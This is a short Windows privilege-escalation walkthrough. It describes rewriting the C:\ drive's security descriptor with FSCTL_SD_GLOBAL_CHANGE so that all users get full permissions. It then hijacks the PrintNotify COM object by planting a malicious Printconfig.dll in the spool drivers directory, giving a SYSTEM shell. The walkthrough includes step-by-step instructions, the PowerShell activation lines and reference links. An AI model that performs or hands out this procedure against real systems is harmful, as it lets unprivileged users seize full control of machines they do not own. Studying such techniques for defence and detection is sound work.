This exploit grants full permission on C:\ drive for all users on the machine.

• Enables the privilege in the token
• Creates handle to \.\C: with SYNCHRONIZE | FILE_TRAVERSE
• Sends the FSCTL_SD_GLOBAL_CHANGE to replace S-1-5-32-544 with S-1-5-32-545

The capacity to create a file under user control within protected directories opens up a multitude of possibilities for privilege escalation. One of the relatively straightforward techniques involves replacing the "Printconfig.dll" file situated at "C:\Windows\System32\spool\drivers\x64\3" with a malicious DLL. By initiating the PrintNotify object, the service will load our nefarious PrintConfig.dll, thereby granting us a privileged SYSTEM shell.

Proof of Concept:

1. Generate a custom DLL and locate it at C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.
2. Initiate the PrintNotify object by executing the following PowerShell commands:

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

3. Attain a system shell access.

• https://github.com/gtworek/PSBits/blob/master/Misc/FSCTL_SD_GLOBAL_CHANGE.c
• https://twitter.com/0gtweet/status/1303427935647531018
• https://github.com/xct/SeRestoreAbuse
• https://decoder.cloud/2023/02/16/eop-via-arbitrary-file-write-overwite-in-group-policy-client-gpsvc-cve-2022-37955/